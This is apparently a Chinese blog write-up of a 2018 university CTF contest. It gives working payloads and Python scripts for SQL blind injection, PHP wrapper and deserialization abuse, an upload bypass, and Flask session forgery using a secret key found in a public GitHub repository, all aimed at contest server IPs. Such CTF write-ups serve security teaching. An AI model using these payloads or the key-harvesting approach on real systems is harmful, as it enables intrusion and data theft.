2018中原工网络安全校赛

最新推荐文章于 2021-08-31 13:57:18 发布
最新推荐文章于 2021-08-31 13:57:18 发布
阅读量260 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41107295/article/details/111880958
版权

time: 2019-04-11 20:31
分类:ctf
趁着周日没事,去瞅一波别人家的校赛。。。emmm,

WEB

web1签到

打开后是他们团队的一个宣传主页,不能右键,以为像往常的题一样,看下源代码就行了,结果啥也没有

然后瞅了一眼响应头,发现问题了
image.png

打开txt后是PHP代码

<?php
$flag = "***";
if (isset($_GET['repo'])) {  
    if (strcmp($_GET['repo'], $flag) == 0) 
        die('Flag: '.$flag);  
    else  
        print 'No';  
}

题目要求让repo与flag字符串相等就输出flag,显然不可能,因为不知道flag是多少,知道了也不做了,,emm
乍看也算是个比较严密的验证逻辑,strcmp()函数也只能处理字符串参数,传个数组进去就能返回false,又由于它与0的比较用的是而非=(允许类型转换后比较),就满足了这个 if 的条件。Payload:?repo[]=a

婉儿(sql)

这题出来就是注入提示
image.png
尝试了一番很多关键字都被过滤了,=、union、database()都不能用,一般的注入都不行,就尝试盲注了
smile大菜鸡给的payload:

39.108.109.85:9001?id=1%26%26if(((select schema_name from information_schema.SCHEMATA limit 0,1) regexp 'c'),sleep(5),1) #

然后
image.png
看到有报错,尝试用脚本去跑数据库,跑出来的不对,结果提交不对,可能脚本错了,没跑全,直到最后结束,
image.png

什么鬼?这不就是
image.png
payload直接就出库了,,,醉了,,
然后各路神仙的骚套路
id=1 or exp(~id)
[外链图片转存失败(img-CjrwipSY-1562587059065)(https://upload-images.jianshu.io/upload_images/9113981-b163d30ea2fce1b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
id=1 or linestring(id)
image.png
id=if(exp(~id),1,2),,,类似的if(payload,1,2)都可以

附上脚本,这个可以跑全

import requests

flag = ""
payload = "select group_concat(schema_name) from information_schema.schemata"
for i in range(1,50):
	for j in "qazxswedcvfrtgbnhyujmkiolp1234567890@,!+_":
		url = f"http://39.108.109.85:9001/?id=if(mid(({payload}),{i},1) regexp '{j}',1,2)"
		r = requests.get(url)
		if "Your id is 1" in r.text:
			flag += j
			break
	print(flag)

image.png

快一点

代码审计

 <?php

include 'flag.php';
if(isset($_GET['t'])){
    $_COOKIE['bash_token'] = $_GET['t'];
}else{
    die("You need get a 't'");
}
if(isset($_POST['sleep'])){
    if(!is_numeric($_POST['sleep'])){              
                                      
        echo 'Gime me a number plz.';
    }else if($_POST['sleep'] < 60 * 60 * 24 * 30 * 2){   
        echo 'NoNoNo sleep too short.';
    }else if($_POST['sleep'] > 60 * 60 * 24 * 30 * 3){
        echo 'NoNoNo sleep too long.';
    }else{
        sleep((int)$_POST['sleep']);  
        getFlag();
    }
}else{
    highlight_file(__FILE__);
}
?>

题目要求sleep是个数字,并在2592000和7776000之间,然后sleep这么长时间,给出flag。
这题主要考察is_numeric()int()的区别。前者支持普通数字型、科学记数法型、部分支持十六进制0x型,在is_numeric()支持的形式中,int()不能正确转换十六进制型、科学计数法型。
因此可以构造6e6、0x4F1A01。

文件上传

想到文件上传,就想到一句话上传文件,然后getshell,常规套路,然后无非就是一些waf的绕过
没想到这题真狗啊,没fuzz,,,,
常规的不能上传php,等文件,可以上传图片,也可以绕过前端抓包上传带有一句话的图片,但结果过上传啥都显示一句上传成功,没路径,怎么getshell??
image.png

image.png
没路径,就一个js弹窗。。。
结束后出题人说的pht
真狗啊,上传pht都可以了
image.png

虽然出的题不难,,但是我不会,,,2333真香,,,,不得不说出题人都很有心思啊tql

admin

打开题后,提示不是admin
然后查看源代码
image.png

这里利用到了php伪协议,否则无法的到admin,读取文件。。

if(isset($user)&&(file_get_contents($user,'r')==="admin"))

如何让file_get_contents($user,‘r’)==="admin"呢?
用php的封装协议php://input,因为php://input可以得到原始的post数据:
image.png

这样便得到了admin的权限
然后读取class.php文件,这里用到php的另一个封装协议:php://filter
利用这个协议就可以读取任意文件了
利用方法:php://filter/convert.base64-encode/resource=index.php
这里把读取到的index.php的内容是base4的格式

image.png

解密的源码

<?php
error_reporting(0);
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
 
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
    echo "hello admin!<br>";
    if(preg_match("/flag/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
 
?>
 
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
 
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
 -->

然后读class.php

<?php
error_reporting(0);
 
class Read{//flag.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}
?>

有源码来看这是一道反序列化题
构造序列化字符串然后传进去读取flag,因为他过滤了flag不能直接读取

class Read{//flag.php
    public $file='php://filter/read=convert.base64-encode/resource=flag.php';
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}
$pass=new Read()

echo serialize($pass);

payload:

?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

post: admin

image.png

解密后得到flag

留言板

这题不会,膜一波官方wp
刚开始做了很长时间没找到思路,
只知道test,user两个号能登陆,不过是普通用户,没卵用
image.png

看到session后觉着这里能利用,解压前面的base64后,
image.png

突然想到换成admin去利用,不过这里不存在的,没私钥不可能登admin
基本放弃,后来官方给了提示,图片地址很关键。。。
image.png

看了下图片地址
https://raw.githubusercontent.com/alipql/tuku/master/8856eac7gy1fkmf2o66yyj205k05kq2z.jpg可以发现alipql这个人的github仓库: https://github.com/alipql 在homework这个库里面的homework2中可以找到一个非空的config.py配置文件:

#!/usr/bin/env python3
# coding=utf-8
import os


class Config():
    BaseDir = os.path.abspath(os.path.dirname(__file__))
    DB_FILE = os.path.join(BaseDir, 'dbfile.sql')
    SQLALCHEMY_DATABASE_URI = 'sqlite:///' + DB_FILE
    SQLALCHEMY_TRACK_MODIFICATIONS = True
    SQLALCHEMY_COMMIT_ON_TEARDOWN = True
    SECRET_KEY = 'dropseckey123'


config = {
    'default': Config
}

从config.py配置文件中可得到secert_key、sql数据库类型。
真是一波社工操作
拿到secert_key后,利用它进行flask的session伪造
脚本
伪造session exp:https://github.com/noraj/flask-session-cookie-manager

""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Lib for argument parsing
import argparse

# Description for help
parser = argparse.ArgumentParser(
            description='Flask Session Cookie Decoder/Encoder',
            epilog="Author : Wilson Sumanang, Alexandre ZANNI")

# prepare sub commands
subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

# create the parser for the encode command
parser_encode = subparsers.add_parser('encode', help='encode')
parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                            help='Secret key', required=True)
parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                            help='Session cookie structure', required=True)

# create the parser for the decode command
parser_decode = subparsers.add_parser('decode', help='decode')
parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                            help='Secret key', required=False)
parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                            help='Session cookie value', required=True)

# get args
args = parser.parse_args()

# external Imports
from flask.sessions import SecureCookieSessionInterface


class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


def session_cookie_encoder(secret_key, session_cookie_structure):
    """ Encode a Flask session cookie """
    try:
        app = MockApp(secret_key)

        session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
        si = SecureCookieSessionInterface()
        s = si.get_signing_serializer(app)

        return s.dumps(session_cookie_structure)
    except Exception as e:
        return "[Encoding error]{}".format(e)


def session_cookie_decoder(session_cookie_value, secret_key=None):
    """ Decode a Flask cookie  """
    try:
        if(secret_key==None):
            compressed = False
            payload = session_cookie_value

            if payload.startswith(b'.'):
                compressed = True
                payload = payload[1:]

            data = payload.split(".")[0]

            data = base64_decode(data)
            if compressed:
                data = zlib.decompress(data)

            return data
        else:
            app = MockApp(secret_key)

            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)

            return s.loads(session_cookie_value)
    except Exception as e:
        return "[Decoding error]{}".format(e)


if __name__ == "__main__":
    # find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(session_cookie_encoder(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(session_cookie_decoder(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(session_cookie_decoder(args.cookie_value))

然后利用脚本去测试一下已知的test,可通过登录用户时返回的session验证SECRETKEY是否正确

image.png

可以利用,然后去伪造admin的session
image.png
这俩是登陆后的session去伪造,都一样可以用
image.png
image.png

替换掉session,即可成功登录到admin账户获取管理权限。
image.png

image.png
可以看到admin的加密密码是不存在的,所以爆破也是不可能的。从这可以得到一个tip,存在一个flag表和flag字段。

delete布尔盲注

对添加用户功能和删除用户功能稍微一测试,会发现删除用户功能是存在注入的,是delete的注入。从config.py的信息泄露中可以知道数据库为sqlite,导致很多函数不能用;由于又是个delete方式,导致很多姿势用不上。

在这里轻微fuzz一下可发现只过滤了drop、update、delete等部分删表删flag改flag的关键字,而and、substr、selete、from、空格等未过滤,参数为单引号包裹,所以可组合一个payload:

' and substr((select flag from flag),1,1)=='f

先增加用户,在删除用户时提交payload再进行布尔判断即可盲注flag。 例如增加111用户后再删除用户111
image.png
image.png

成功删除用户,返回包不存在111,说明flag第一个字母为f。若改为
usernamedel=111’ and substr((select flag from flag),1,1)=='0

image.png
显示成功删除却依然存在111用户,没删除用户,说明第一位不为0,然后接下来写脚本去跑就行了

#!/usr/bin/env python3

# coding=utf-8

import requests
class sqliexp:
    def __init__(self):
        self.url = 'http://172.93.39.218:8888/admin'
        self.session = 'eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIlx1NzY3Ylx1NWY1NVx1NjIxMFx1NTI5ZiJdfV0sIm5hbWUiOiJhZG1pbiJ9.XB-iXg.PURonzshjlDsEvsXYZ24YyuAgI4'
        self.flag = ''

    #增加111用户
    def adduser(self):
        cookies = {'session':self.session}
        data = {'username':'111','password':'111'}
        try:
            requests.post(url=self.url, cookies=cookies,data=data)
        except TimeoutError:
            exit(-1)
    def deluser(self,num):
        cookies = {'session':self.session}
        for strs in 'flag{}0123456789bcde':
            payload = "111' and substr((select flag from flag),%d,1)=='%s" % (num,strs)
            data = {'usernamedel':payload}
            try:
                response = requests.post(url=self.url,data=data,cookies=cookies)
                if '111' not in response.text:
                    self.flag += strs
                    return 1
            except TimeoutError:
                exit(-1)
if __name__ == '__main__':
    exp = sqliexp()
    for num in range(1,39,1):
        exp.adduser()
        exp.deluser(num)
        print(exp.flag)

image.png

另附脚本:

import requests

url = "http://172.93.39.218:8888/admin"
_cookies = {"session":"eyJuYW1lIjoiYWRtaW4ifQ.XB8bYA.JJ0tfi65cm3uS-ATDe9FNls4y_Y"}
flag = "flag{db"

for i in range(8,50):
	r= requests.post(url,cookies=_cookies,data={"username":"iv4n","password":"a"})
	for j in "1234567890qazxswedcvfrtgbnhyujmkiolp{}":
		r = requests.post(url,cookies=_cookies,data={"usernamedel":f"iv4n' and (select hex(substr(flag,{i},1)) from flag)=hex('{j}')-- -"})
		if "iv4n" not in r.text:
			flag += j
			break
	print(flag)

image.png

CYPTO

就给了一张图,本来不知道什么加密,上面放了张海伦的图,海伦是个盲人,盲文?(其实是问了学姐才知道的2333)

image.png

百度盲文表
image.png

然后对照是
kmdonowg
然后MD5加密得flag

MISC

中原工学院图书馆

这道隐写题原来在windows下没分出来,kali下binwalk可以分出来一个压缩包,里面有txt文件,打开看
可以看到文件头是png的,改为png

image.png

image.png

image.png

然后rot13

image.png

BerL1n
关注
专栏目录
题解 | #确定哪些订单购买了 prod_id...#
2301_79125431的博客
04-18 645
主要是问科研项目,八股涉及很少,然后让我复盘了机考[牛泪],手撕加汽油,没手撕出来讲了思路。各位大佬帮忙看看,为什么在Boss上投完简历,就没然后了,之前有几个公司要我线下面试,然后太远了,我。楼主只考虑武汉,终极二选一了公积金都是12%,浪潮6险一金,双休,hr说晚上6,7点基本下班。25届选手,还没找到暑期实习,目前面了几家,基本上感觉是面完已经寄了,有没有点击就送的实习啊,不能转。途游游戏,科锐国际(计算机类),得物,蓝禾,奇安信,顺丰,康冠科技,金证科技24春招内推①得物【岗位。
程序员常识--OJ系统及ACM测试题库大全
菲菲家的吴先森
08-21 5654
OJ是Online Judge系统的简称,用来在线检测程序源代码的正确性。著名的OJ有RQNOJ、URAL等。国内著名的题库有北京大学题库、浙江大学题库等。国外的题库包括乌拉尔大学、瓦拉杜利德大学题库等。 简介:   Online Judge系统(简称OJ)是一个在线的判题系统。用户可以在线提交程序多种程序(如C、C++)源代码,系统对源代码进行编译和执行,并通过预先设计的测试数据来检验程序源
BWVS-PHP伪协议
baynk的博客
11-26 895
0x00 前言 这个也算文件包含漏洞的一部分吧,刚刚好整理了下,就当漏洞复现了。 //php支持的伪协议 file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — ...
2016xctf一道ctf题目
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)
csu_vc的博客
10-28 9382
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
蓝盾CTF 第二场 WP
weixin_30508309的博客
11-05 208
签到题 修改一个大小值 、 2.简单的Web题 根据提示是一个POST的一个传值。只要绕过strcmp函数即可 传递是是一个数组,构造一下成为password[]=a 3.送大礼 含有一个flag.txt文件。进去之后看的很可怕。 把那些东西放在谷歌的consle中的出来的是一个php extract(...
ctf中的一道反序列化题
weixin_40709439的博客
09-27 5304
早就想写了,今天刚好遇到一道反序列化的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
7000个源码批量下载---复制来的
weixin_34353714的博客
09-12 4万+
7000个源码批量下载 7000个源码批量下载 < type="text/javascript" language="JavaScript">document.title="7000个源码批量下载 - "+document.title http://asp.lt263.com/soft/SaGuestBook.rar安全天使字符界面留言本(SaGuestBook)htt...
参考文献
热门推荐
Ω|狐步幻影
10-26 7万+
[ IIS 6 = php 5 + MySQL 5 ]body { font-family:verdana; cursor:default;}td {font-size:14px;color:darkslategray;line-height:150%}a:link {color:whitesmoke}a:hover {color:silver}a:visited
【知识点整理】bugku php语法相关
lx233
10-17 423
【记得复习!这是硬性的知识 你还忘得一干二净 别说以前的acm了。。。】 【复习就会发现,其实以前你根本没明白[跪] 由此即使花费了大量时间也值得 因为我们不是刷数目 做过讲不来 做过讲错 等于没做 按照周期 qaq  先复习 】 1. urldecode  url编码  base64编码 2.sha1也是加密编码 3.file_get_contents() 把文件读入一个字符串。 4....
反序列化漏洞实例
buffedon的博客
06-10 1194
反序列化漏洞实例网页源码测试过程 网页源码 index.php <!DOCTYPE html> <body> <a href="../index.php">их╗п</a></body></html> <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_conte
ctf题php反序列化,[世安杯]一道关于php反序列化漏洞的题目
weixin_36440198的博客
04-01 1035
Paste_Image.png没什么信息,因此ctrl+u查看源码:Paste_Image.png看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到Paste_Image.png查看原文因此试一试:Paste_Image.png补充一种饶过方法:由于本题:allow_url_include=On因此可以包含一个远程文件,假设你的云服务IP地址为:x...
BugkuCTF中套路满满的题-------Welcome to the bugku
qq_42133828的博客
01-24 1828
这套题目主要涉及到的知识是php伪协议,若是不了解这个的话,这道题目基本就out了。。。 当然,不了解的小伙伴,可以到这位大佬的博客去瞅瞅https://www.freebuf.com/column/148886.html 其实总结之后,最常所用到的不过是php://input(将文件的内容读出)以及php://filter/read=convert.base64-encode/resourc...
记一道集PHP伪协议&PHP反序列化综合运用的CTF
qq_38680693的博客
08-05 4211
题目:http://120.24.86.145:8006/test1/ 首先拿到题目后,毫无疑问,查看一下源码 &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($user,...
python学习笔记——程序的异常处理和其他内置函数
Ultimate_dream的博客
04-27 743
python学习笔记——程序的异常处理和其他内置函数1.try-except语句1.1例子2. 异常的高级用法2.1 例子3.异常语句与finally,else配合使用3.1例子4.异常处理小结5.其他内置函数5.1例子 1.try-except语句 python异常信息中最重要的是异常类型,它表明异常发生的原因,也是程序处理异常的依据。 try-except基本语法结构如下: try: ...
SpringBoot整合vue-admin-template实现登录
liu320yj的博客
11-04 1万+
vue-admin-template简介 前后端分离开发模式越来越受开发人员的喜爱,开源项目vue-admin-template 是一个后台前端解决方案,它基于 vue 和 element-ui实现。更多详情请阅读vue-template-admin官网,vue-admin-template项目是其基础模板,本文基于vue-admin-template实现与SpringBoot的整合 SpringBoot整合vue-admin-template ...
性能测试之Jmeter参数化
软件测试阿沐博客
08-31 837
01.Jmeter参数化作用 参数化就是将某一些请求中的一些参数值替换为动态的请求,比如第一次请求的值是a,下一次迭代请求想变成b,这就是典型的参数化场景。 其目的在于模块真实的用户请求。 02.Jmeter文件参数化 03.Jmeter数值函数参数化 函数助手使用 随机函数:${__Rando(1000,9999,)} 该函数有3个参数,第一个参数表示最小的数字,第二个表示范围内最大数字,第三个为变量名称。通常用来表示本次迭代的值是多少。 注意: 如果后期使用该值直...
php反序列化及__toString()
sinat_31884905的博客
02-21 3660
主要两个文件 index.php <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; if(preg_match("/f1a9/",$file)){ e
CTF-练习平台 Web writeup By Assassin [暂时完结]
Assassin
04-06 7万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
中原学院校园网络规划策略与技术目标
"校园网络规划期末作业是一份针对中原学院的网络设计方案,由09网络2班学生马伟完成。该作业旨在解决我国校园网发展中的问题,即尽管CERNET自1994年起逐步连接国内多所学校,包括中小学,但许多校园网的实际应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BerL1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值